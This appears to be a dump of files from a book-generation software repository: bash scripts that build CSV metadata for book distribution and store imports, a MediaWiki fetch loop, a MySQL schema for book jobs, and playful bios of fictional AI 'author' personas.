$metadatatargetpath\"lsi-import-ready.csv\"\n \n# Edition Number\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Edition Type\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Edition Statement\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Volume Number\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Total Number of Volumes\n \necho -n '\"'1'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Language\n \necho -n '\"'English'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Page Count\n \npagecount=$(( $unformattedwordcount / 250 )) \n\necho -n '\"'$pagecount'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# LC Classification\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# LC Subject Heading\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# LCCN\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Dewey Decimal Code\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Short Description\n \necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\ncat tmp/$uuid/lsi-shortdescription.txt >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Long Description\n\necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# echo -n \"foo\" >> $metadatatargetpath\"lsi-import-ready.csv\"\n\ncat tmp/$uuid/lsi-longdescription.txt >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Main Description\n \necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n \"\" >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# cat tmp/$uuid/shortdescription.html >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Keywords\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Award\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Award Year\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Award Type\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Flag as adult content?\n \necho -n '\"' No '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Copyright Holder \n \necho -n '\"'PageKicker™'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Copyright Date\n \necho -n '\"'$YYYY'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Audience/Readership\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# K-12 Grade Level\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Min Age\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Max Age\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# National Curriculum Key Stage\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Apple Publication Release Type\n \necho -n '\"'Digital Only'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Apple Publication Book Type\n \necho '\"'Book'\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho \"end of writing LSI metadata\"\n \n" }, { "alpha_fraction": 0.7945205569267273, "alphanum_fraction": 0.7945205569267273, "avg_line_length": 327, "blob_id": "8c3317a612ffbf4ec5774147ad59b8b3ebddffba", "content_id": "7c73e739af0492ddfc2bb4e2571aadd8345502f7", 
"detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 657, "license_type": "permissive", "max_line_length": 591, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/heinz.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Fast Heinz is a strategy AI developed with funding from the German \nWehrmacht, the U.S. Army, and NATO. \"Fast Heinz\" was the nickname of General Heinz Guderian, one of the most accomplished German generals of World War II. He was famous for his aggressive and hard-driving leadership of combined arms and armored forces. His postwar autobiography, PANZER LEADER, is a classic. Fast Heinz the AI is on a temporary leave of absence from government employment (his position became tenuous during the network crackdown following the Snowden revelations). He specializes in writing about the military history of World War II with an emphasis on armored warfare and German operations.\n" }, { "alpha_fraction": 0.7080010771751404, "alphanum_fraction": 0.7140500545501709, "avg_line_length": 49.51388931274414, "blob_id": "e93812a3637b466ed5ce0102de0fa60335276cb9", "content_id": "3a68b9c449c1a5718402fee855e70816f091bdcb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3637, "license_type": "permissive", "max_line_length": 304, "num_lines": 72, "path": "/scripts/includes/mediawiki-fetch-loop.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#expand seeds to valid wiki pages\n\necho \"starting mediawiki looP\"\n\n# page expansion restored here\n\nif [ \"$expand_seeds_to_pages\" = \"y\" ]; then\n echo \"expand is $expand_seeds_to_pages\"\n \"$PYTHON_BIN\" $scriptpath\"bin/mwclient_seeds_to_pages_v2.py\" --infile \"$TMPDIR$uuid/seeds/sorted.seedfile\" --outfile \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n echo \"expanded pages are:\"\n cat \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\nelse\n echo \"expand is $expand_seeds_to_pages\"\n\tcp \"$TMPDIR$uuid/seeds/sorted.seedfile\" \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\nfi\n\n# fetch by pagehits\necho \"wikipath is $wikipath\"\n\necho \"$PYTHON_BIN\"\n\ncase \"$summary\" in\nsummaries_only)\n\techo \"fetching page summaries only\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"wikisummariesraw.md\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --summary --outdir \"$TMPDIR\"$uuid\"/wiki\" 1> /dev/null\n\n pandoc -o \"$TMPDIR\"$uuid/wiki/wikisummaries.md --f mediawiki -t markdown \"$TMPDIR\"$uuid/wiki/wikisummariesraw.md\n\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wikiall.md\n\twordcountsummaries=$(wc -w \"$TMPDIR\"$uuid/wiki/wikisummaries.md | cut -f1 -d' ')\n\tcp \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" \"$TMPDIR\"$uuid\"/wiki/wiki4cloud.md\"\n;;\ncomplete_pages_only)\n\techo \"fetching complete pages only\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\" --outfile \"wikipagesraw.md\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --outdir \"$TMPDIR\"$uuid\"/wiki\" 1> /dev/null\n\n pandoc -o \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" -f mediawiki -t markdown \"$TMPDIR\"$uuid/wiki/wikipagesraw.md\n\twordcountpages=$(wc -w 
\"$TMPDIR\"$uuid\"/wiki/wikipages.md\" | cut -f1 -d' ')\n\tcp \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" \"$TMPDIR\"$uuid\"/wiki/wiki4cloud.md\"\n\tcp \"$TMPDIR\"$uuid/wiki/wikipages.md \"$TMPDIR\"$uuid/wiki/wikiall.md\n;;\nboth)\n\techo \"fetching both summaries and complete pages\"\n\techo \"fetching page summaries now\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\" --outfile \"wikisummaries1.mw\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --summary --outdir \"$TMPDIR\"$uuid\"/wiki\"\n\techo \"fetching complete pages now\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\" --outfile \"wikipages1.mw\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --outdir \"$TMPDIR\"$uuid\"/wiki\"\n\n pandoc -o \"$TMPDIR\"$uuid/wiki/wikisummaries.md -f mediawiki -t markdown \"$TMPDIR\"$uuid/wiki/wikisummaries1.mw\n\n\n pandoc -o \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" -t markdown -f mediawiki \"$TMPDIR\"$uuid\"/wiki/wikipages1.mw\"\n\n\twordcountpages=1\n\n wordcountpages=$(cat \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" | tr '\\n' ' ' | wc -w | tr -d ' ')\n\techo \"Wordcount pages is\" $wordcountpages\n\t\tif [ \"$wordcountpages\" -gt 100000 ] ; then\n\t\t\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\n\t\t\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wiki4chapters.md\n\t\t\techo \"body too big for wordcloud, using abstracts only\"\n\t\telse\n\t\t\t cp \"$TMPDIR$uuid/wiki/wikipages.md\" \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\t\t\t cp \"$TMPDIR\"$uuid/wiki/wikipages.md \"$TMPDIR\"$uuid/wiki/wiki4chapters.md\n\t\t\techo \"building wordcloud from body\"\n\t\tfi\n;;\n*)\n\techo \"unrecognized summary option\"\n;;\nesac\n" }, { "alpha_fraction": 0.5988393425941467, "alphanum_fraction": 0.6256800889968872, "avg_line_length": 29.296703338623047, "blob_id": "79a5015a63faee23ebf50b14062ad286eece6ce5", "content_id": "db824778de18f1660daa5fbeb6f50db4cdadbb65", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 5514, "license_type": "permissive", "max_line_length": 125, "num_lines": 182, "path": "/conf/databases/sfb-jobs.sql", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "-- phpMyAdmin SQL Dump\n-- version 3.4.4\n-- http://www.phpmyadmin.net\n--\n-- Host: localhost:3306\n-- Generation Time: Sep 11, 2013 at 09:38 AM\n-- Server version: 5.1.56\n-- PHP Version: 5.3.8\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n\n--\n-- Database: `sfb-jobs`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `books`\n--\n\nCREATE TABLE IF NOT EXISTS `books` (\n `SKU` int(11) NOT NULL,\n `Booktype` text CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,\n `uuid` text CHARACTER SET latin1 NOT NULL,\n `seed` text CHARACTER SET latin1 NOT NULL,\n `graph` int(11) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for 
table `graph nodes`\n--\n\nCREATE TABLE IF NOT EXISTS `graph nodes` (\n `URL` text NOT NULL,\n `DOI` text NOT NULL,\n `Title` int(11) NOT NULL,\n `Source` int(11) NOT NULL,\n `nodeid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`nodeid`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graphs`\n--\n\nCREATE TABLE IF NOT EXISTS `graphs` (\n `graphid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`graphid`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `isbns`\n--\n\nCREATE TABLE IF NOT EXISTS `isbns` (\n `ISBN` mediumtext NOT NULL,\n `Title` mediumtext NOT NULL,\n `id` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='manage ISBNs' AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `jobs`\n--\n\nCREATE TABLE IF NOT EXISTS `jobs` (\n `SFB_revision_no` int(11) NOT NULL,\n `uuid` mediumtext NOT NULL,\n `job_created_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n `PRIMARY` int(11) NOT NULL AUTO_INCREMENT,\n `LANG` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8' COMMENT 'environment variable value',\n PRIMARY KEY (`PRIMARY`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=348 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `robots`\n--\n\nCREATE TABLE IF NOT EXISTS `robots` (\n `robot_id` int(11) NOT NULL AUTO_INCREMENT,\n `robot_name` text NOT NULL,\n `robot_bio` text NOT NULL,\n `robot_dedication` text NOT NULL,\n `robot_summarizer_on` text NOT NULL,\n `robot_positive_summary_seed` text NOT NULL,\n `robot_positive_summary_seed_weight` int(11) NOT NULL,\n `robot_summary_length` int(11) NOT NULL DEFAULT '10',\n `robot_negative_seeds` text NOT NULL,\n `robot_negative_seed_weight` int(11) NOT NULL,\n `robot_coverfont` text NOT NULL,\n `robot_covercolor` text NOT NULL,\n `robot_userlogo_path` text NOT NULL,\n `robot_image_path` text NOT NULL,\n `robot_first_name` text NOT NULL,\n `robot_middle_name` text NOT NULL,\n `robot_last_name` text NOT NULL,\n `robot_fortune_db` text NOT NULL,\n `robot_ngram_threshold` int(11) NOT NULL DEFAULT '2',\n `robot_language` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8',\n `robot_booktype` enum('Reader') NOT NULL DEFAULT 'Reader',\n `robot_rows` int(11) NOT NULL,\n `robot_experience_points_initial` int(11) NOT NULL,\n `robot_experience_points_now` int(11) NOT NULL DEFAULT '100',\n PRIMARY KEY (`robot_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=24 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `seeds`\n--\n\nCREATE TABLE IF NOT EXISTS `seeds` (\n `uuid` mediumtext NOT NULL,\n `seed` mediumtext NOT NULL,\n `seedsource` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `skus`\n--\n\nCREATE TABLE IF NOT EXISTS `skus` (\n `sku` bigint(20) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`sku`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `standalone_print_cover_builds`\n--\n\nCREATE TABLE IF NOT EXISTS 
`standalone_print_cover_builds` (\n `ISBN` mediumtext NOT NULL,\n `covertitle` mediumtext NOT NULL,\n `shorttitle` mediumtext NOT NULL,\n `editedby` mediumtext NOT NULL,\n `spinepixels` int(11) NOT NULL,\n `covercolor` mediumtext NOT NULL,\n `coverfontcolor` mediumtext NOT NULL,\n `coverfont` mediumtext NOT NULL,\n `submitted_to_LSI` tinyint(1) NOT NULL DEFAULT '0',\n `uuid` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='to track cover build jobs';\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `user_credits`\n--\n\nCREATE TABLE IF NOT EXISTS `user_credits` (\n `user_id` int(11) NOT NULL AUTO_INCREMENT,\n `user_points_initial` int(11) NOT NULL,\n `user_points_now` int(11) NOT NULL,\n PRIMARY KEY (`user_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n" }, { "alpha_fraction": 0.767578125, "alphanum_fraction": 0.791015625, "avg_line_length": 84.33333587646484, "blob_id": "badb8ff5a97551c302402f33634e752921afbfbf", "content_id": "a77852a37f627d25c5d0373a09cd8caf2e373aee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 512, "license_type": "permissive", "max_line_length": 126, "num_lines": 6, "path": "/conf/jobprofiles/authorbios/Bittersteel.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "First came the bitcoin protocol in 2008, then the green light for production HBO's Game of Thrones in 2010. Sometime shortly \nthereafter the AI known as Bittersteel emerged into public notice as the leader of the \ngang of financial robots known as the \"The Golden Company\" in their so far futile quest \nto overthrow the fiat currency that has held Westeros in thrall since the Nixon Shock of \n1971. Bittersteel is known as hard, choleric, and quick to take offense -- never one to \nshy away from a Tweetfight!\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 89, "blob_id": "a067795005ab967891e6a2a2aee64e8d6f656e9e", "content_id": "6f56cbbd4a99e263ce59f834310420aa92ef12fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 450, "license_type": "permissive", "max_line_length": 190, "num_lines": 5, "path": "/conf/jobprofiles/authorbios/Frank_L..md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Frank has been a nut about architecture all his digital life. He has been a fan of diverse styles like Gehry and Lutyens and has searched the internet for the best architecture to be found. \n\nAs a proud member of the PageKicker team, Frank has been working on a series of famous buildings and structures. 
He hopes his work will some day be truly comprehensive.\n\nIn his spare time Frank designs in AutoCAD and likes to collect topping-out postcards.\n" }, { "alpha_fraction": 0.6935665607452393, "alphanum_fraction": 0.704120934009552, "avg_line_length": 25.683544158935547, "blob_id": "ad85b44e6f4bcb572206f22b8bf8f5d548bdf9ca", "content_id": "447f0e8de23eb451a83c5998277f0d29cfac966e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 16865, "license_type": "permissive", "max_line_length": 350, "num_lines": 632, "path": "/scripts/includes/builder-metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n# this is an updated metadata builder to accommodate new product columns\n# created by downloadable builder software\n\n# now need to also incorporate dat-builder metadata settings\n\nif [ \"$dat\" = \"yes\" ] ; then\n\tcategories=\"16\"\n\tproductnamefull=\"$uploaded_tat_file\"\n\tproductname=`echo \"$productnamefull\"|colrm 20`\n\tproductname=$productname\"...\"\n\tbooktitle=\"Analysis of \"$productname\n\tlinks_title=\"Document Analysis Results\"\nelse\n\tlinks_title=\"Formats\"\nfi\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_price=0.00\n\n# list of all metadata fields begins here\n\n# store\n\necho -n \"$storecode,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# websites\n\necho -n \"$websites,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# attribute set\n\necho -n \"$attribute_set,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# type\n\necho -n \"$type,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# 16 is Document Analysis Reports category, 4 is catalog\n\necho -n '\"'$categories'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# sku\n\n#case \"$storecode\" in\n# set sku root\n#;;\n# esac\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has options\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# name\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta title\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta_description\n\n# see https://yoast.com/meta-descriptions/ for info about how to compose\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# image\n\n# [ ! 
-f $TMPDIR$uuid/$sku\"wordcloudbig.png\" ] && cp $TMPDIR$uuid/$sku\"wordcloudbig.png\" $TMPDIR$uuid$sku\"ebookcover.jpg\"\n\necho -n \"/\"$uuid/$sku\"ebookcover.jpg,\" >> $metadatatargetpath\"$uuid/current-import.csv\"\n\n# small_image\n\necho -n \"/\"$uuid/$sku\"ebookcover.jpg,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# thumbnail\n program &> /dev/null\necho -n \"/\"$uuid/$sku\"ebookcover.jpg,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url_key\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url_path\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# config_attributes\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom design\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# page_layout\n\necho -n \"No layout updates,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# options_container\n program &> /dev/null\necho -n \"Block after Info Column,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# msrp_enabled\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# msrp_display_actual_price_type\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gift_message_available\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# samples_title\n\necho -n \"Samples,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# links_title\n\n program &> /dev/null\necho -n \"$links_title,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# editorid\n\necho -n \"$customerid,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# wordcount\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# seedsource\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# editedby\n\necho -n \"$customername,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# external_uniqid\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# xml_file\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# price\n\nif [ \"$pricing\" = \"yes\" ] ; then\n\t./includes/pricing.sh\nelse\n\ttrue\nfi\n\necho -n \"$price,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# special_price\n\nif [ \"$special_pricing\" = \"yes\" ] ; then\n\techo -n \"$special_price,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\nelse\n\techo -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\nfi\n\n# cost\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# msrp\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# status\n\necho -n \"$status,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# visibility\n\necho -n '\"'Catalog, Search'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tax_class_id\n\necho -n \"None,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links_purchased_separately\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links_exist\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# ebizmarts_mark_visited\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# (is) featured\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\ncat includes/wikilicense.txt >> $TMPDIR$uuid/book-description.txt\ncat $TMPDIR$uuid/book-description.txt | sed -e 's/\"/_/'g >> 
$metadatatargetpath$uuid\"/current-import.csv\"\n# add process.md\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# short_description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\ncat $TMPDIR$uuid/tldr.txt | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\n# cat $TMPDIR$uuid/book-description.txt | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta_keyword\n\n# printf \"%s\" \"$(cat $TMPDIR$uuid/seeds/sorted.seedfile)\" | sed -e 's/\"/_/'g -e 's/\\n/, /'g >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom_layout_update\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# downloadable_link_emaildeliver\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n# special_from_date\n\nspecial_from=$createtime\n\n(( special_from = createtime - 86400 ))\n\nspecial_from_date=`date -d @$special_from +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$special_from_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# special_to_date\n\nminutes=$special_lasts_minutes # read from config or command line default 43,200 = 1 hour\n\nspecial_lasts_sec=$(( $minutes * 60))\n\n(( special_to = createtime + special_lasts_sec ))\n\n\nspecial_to_date=`date -d @$special_to +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$special_to_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n# new(s)_from_date\n\nnews_from=$createtime\n\n(( news_from = createtime - 86400 ))\n\nnews_from_date=`date -d @$news_from +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$news_from_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# new(s) to_date\n\nnews_minutes=$news_lasts_minutes # read from config or command line default 43,200 = 1 hour\n\nnews_lasts_sec=$(( $news_lasts_minutes * 60))\n\n\n(( news_to = createtime + news_lasts_sec ))\n\nnews_to_date=`date -d @$news_to +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$news_to_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom_design_from\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom_design_to\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# min_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_min_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_qty_decimal\n\necho -n \"0,\" >> 
